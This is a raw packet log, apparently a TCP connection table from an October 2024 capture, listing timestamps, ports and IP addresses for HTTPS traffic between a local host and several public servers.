                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.218029022 CEST49736443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.218049049 CEST4434973613.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.218748093 CEST49738443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.218755960 CEST4434973813.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.218911886 CEST49738443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.219290018 CEST49738443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.219300032 CEST4434973813.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.219423056 CEST49737443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.219429970 CEST4434973713.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.232923031 CEST4434973313.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.232945919 CEST4434973313.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.233010054 CEST49733443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.233017921 CEST4434973313.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.233051062 CEST49733443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.233128071 CEST4434973313.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.233165026 CEST4434973313.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.233196974 CEST49733443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.233278036 CEST49728443192.168.2.7169.150.236.104
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.234209061 CEST49733443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.234216928 CEST4434973313.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.239214897 CEST49739443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.239242077 CEST4434973913.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.239566088 CEST49739443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.240379095 CEST49739443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.240391970 CEST4434973913.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.244436979 CEST4434973113.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.244483948 CEST4434973113.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.244652987 CEST49731443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.245465994 CEST49731443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.245487928 CEST4434973113.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.245512962 CEST49731443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.245518923 CEST4434973113.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.249056101 CEST49740443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.249070883 CEST4434974013.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.249239922 CEST49740443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.249413013 CEST49740443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.249420881 CEST4434974013.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.261118889 CEST44349728169.150.236.104192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.261192083 CEST44349728169.150.236.104192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.263309956 CEST49728443192.168.2.7169.150.236.104
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.263982058 CEST49728443192.168.2.7169.150.236.104
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.264008045 CEST44349728169.150.236.104192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.469866037 CEST44349725142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.469902039 CEST44349725142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.470072985 CEST49725443192.168.2.7142.250.185.161
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.470098972 CEST44349725142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.471551895 CEST44349726142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.471580982 CEST44349726142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.471621037 CEST49726443192.168.2.7142.250.185.161
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.471632957 CEST44349726142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.472801924 CEST44349725142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.472892046 CEST49725443192.168.2.7142.250.185.161
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.472902060 CEST44349725142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.474515915 CEST44349726142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.474566936 CEST49726443192.168.2.7142.250.185.161
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.474575996 CEST44349726142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.479137897 CEST44349725142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.479388952 CEST49725443192.168.2.7142.250.185.161
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.479398966 CEST44349725142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.484041929 CEST44349726142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.484066963 CEST44349726142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.484102964 CEST49726443192.168.2.7142.250.185.161
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.484111071 CEST44349726142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.484143972 CEST49726443192.168.2.7142.250.185.161
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.485462904 CEST44349725142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.485568047 CEST49725443192.168.2.7142.250.185.161
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.485574961 CEST44349725142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.490104914 CEST44349726142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.491909027 CEST44349725142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.492095947 CEST49725443192.168.2.7142.250.185.161
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.492103100 CEST44349725142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.496436119 CEST44349726142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.496467113 CEST44349726142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.496592045 CEST49726443192.168.2.7142.250.185.161
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.496620893 CEST44349726142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.496685982 CEST49726443192.168.2.7142.250.185.161
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.498112917 CEST44349725142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.498282909 CEST49725443192.168.2.7142.250.185.161
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.498292923 CEST44349725142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.498311996 CEST44349725142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.498385906 CEST49725443192.168.2.7142.250.185.161
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.501041889 CEST49725443192.168.2.7142.250.185.161
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.501060963 CEST44349725142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.503319979 CEST44349726142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.508893013 CEST44349726142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.508919954 CEST44349726142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.508940935 CEST49726443192.168.2.7142.250.185.161
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.508949995 CEST44349726142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.508999109 CEST49726443192.168.2.7142.250.185.161
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.554461002 CEST49743443192.168.2.7172.217.16.129
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.554486990 CEST44349743172.217.16.129192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.554538012 CEST49743443192.168.2.7172.217.16.129
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.554874897 CEST49743443192.168.2.7172.217.16.129
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.554886103 CEST44349743172.217.16.129192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.557382107 CEST44349726142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.560177088 CEST44349726142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.560245037 CEST49726443192.168.2.7142.250.185.161
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.560254097 CEST44349726142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.560355902 CEST44349726142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.560400963 CEST49726443192.168.2.7142.250.185.161
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.560408115 CEST44349726142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.567456007 CEST44349726142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.567495108 CEST49726443192.168.2.7142.250.185.161
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.567507982 CEST44349726142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.567519903 CEST44349726142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.567567110 CEST49726443192.168.2.7142.250.185.161
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.568133116 CEST49726443192.168.2.7142.250.185.161
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.568147898 CEST44349726142.250.185.161192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.601140022 CEST49744443192.168.2.7172.217.16.129
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.601167917 CEST44349744172.217.16.129192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.601212978 CEST49744443192.168.2.7172.217.16.129
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.601783991 CEST49744443192.168.2.7172.217.16.129
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.601794958 CEST44349744172.217.16.129192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.848748922 CEST44349734149.56.240.127192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.849062920 CEST49734443192.168.2.7149.56.240.127
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.849082947 CEST44349734149.56.240.127192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.850097895 CEST44349734149.56.240.127192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.850151062 CEST49734443192.168.2.7149.56.240.127
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.851294041 CEST49734443192.168.2.7149.56.240.127
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.851341963 CEST44349734149.56.240.127192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.851804972 CEST49734443192.168.2.7149.56.240.127
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.851810932 CEST44349734149.56.240.127192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.865458012 CEST4434973813.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.866040945 CEST49738443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.866079092 CEST4434973813.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.866820097 CEST49738443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.866826057 CEST4434973813.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.869395018 CEST4434973713.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.869534969 CEST4434973613.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.869914055 CEST49737443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.869926929 CEST4434973713.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.870625973 CEST49737443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.870630980 CEST4434973713.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.871071100 CEST49736443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.871093988 CEST4434973613.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.871947050 CEST49736443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.871953964 CEST4434973613.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.906655073 CEST49734443192.168.2.7149.56.240.127
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.907247066 CEST4434973913.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.908128023 CEST49739443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.908148050 CEST4434973913.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.909203053 CEST49739443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.909210920 CEST4434973913.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.913489103 CEST49748443192.168.2.7151.101.129.229
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.913530111 CEST44349748151.101.129.229192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.913763046 CEST49748443192.168.2.7151.101.129.229
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.914315939 CEST49748443192.168.2.7151.101.129.229
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.914325953 CEST44349748151.101.129.229192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.935096025 CEST4434974013.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.935586929 CEST49740443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.935596943 CEST4434974013.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.937210083 CEST49740443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.937215090 CEST4434974013.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.937547922 CEST49671443192.168.2.7204.79.197.203
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.955962896 CEST44349734149.56.240.127192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.956027985 CEST44349734149.56.240.127192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.956075907 CEST49734443192.168.2.7149.56.240.127
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.959042072 CEST49734443192.168.2.7149.56.240.127
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.959053040 CEST44349734149.56.240.127192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.966895103 CEST4434973813.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.966953993 CEST4434973813.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.967041016 CEST49738443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.969525099 CEST49738443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.969543934 CEST4434973813.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.971369028 CEST4434973713.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.971424103 CEST4434973713.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.971568108 CEST49737443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.972141981 CEST4434973613.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.972203016 CEST4434973613.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.972296953 CEST49736443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.972872972 CEST49737443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.972882986 CEST4434973713.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.972894907 CEST49737443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.972901106 CEST4434973713.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.973752022 CEST49736443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.973773956 CEST4434973613.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.973786116 CEST49736443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.973792076 CEST4434973613.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.975965977 CEST49749443192.168.2.7141.101.120.11
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.975995064 CEST44349749141.101.120.11192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.976048946 CEST49749443192.168.2.7141.101.120.11
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.976425886 CEST49749443192.168.2.7141.101.120.11
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.976435900 CEST44349749141.101.120.11192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.986113071 CEST49750443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.986145973 CEST4434975013.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.986232042 CEST49750443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.988713980 CEST49751443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.988738060 CEST4434975113.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.988789082 CEST49751443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.990626097 CEST49752443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.990662098 CEST4434975213.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.990729094 CEST49752443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.991008997 CEST49750443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.991020918 CEST4434975013.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.991358995 CEST49751443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.991369963 CEST4434975113.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.991591930 CEST49752443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.991605043 CEST4434975213.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.007761955 CEST49753443192.168.2.7149.56.240.129
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.007791996 CEST44349753149.56.240.129192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.008039951 CEST49753443192.168.2.7149.56.240.129
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.008840084 CEST49753443192.168.2.7149.56.240.129
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.008852005 CEST44349753149.56.240.129192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.010540962 CEST4434973913.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.010612011 CEST4434973913.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.010657072 CEST49739443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.011018991 CEST49739443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.011033058 CEST4434973913.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.020929098 CEST49754443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.020950079 CEST4434975413.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.021040916 CEST49754443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.021213055 CEST49754443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.021223068 CEST4434975413.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.041459084 CEST4434974013.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.041524887 CEST4434974013.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.041610956 CEST49740443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.041732073 CEST49740443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.041738033 CEST4434974013.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.041748047 CEST49740443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.041752100 CEST4434974013.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.047102928 CEST49755443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.047156096 CEST4434975513.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.047379017 CEST49755443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.047569990 CEST49755443192.168.2.713.107.246.60
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.047586918 CEST4434975513.107.246.60192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.308486938 CEST44349743172.217.16.129192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.308728933 CEST49743443192.168.2.7172.217.16.129
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.308748960 CEST44349743172.217.16.129192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.309099913 CEST44349743172.217.16.129192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.309113979 CEST44349743172.217.16.129192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.309159040 CEST49743443192.168.2.7172.217.16.129
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.309165955 CEST44349743172.217.16.129192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.309202909 CEST49743443192.168.2.7172.217.16.129
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.309829950 CEST44349743172.217.16.129192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:34.309992075 CEST49743443192.168.2.7172.217.16.129
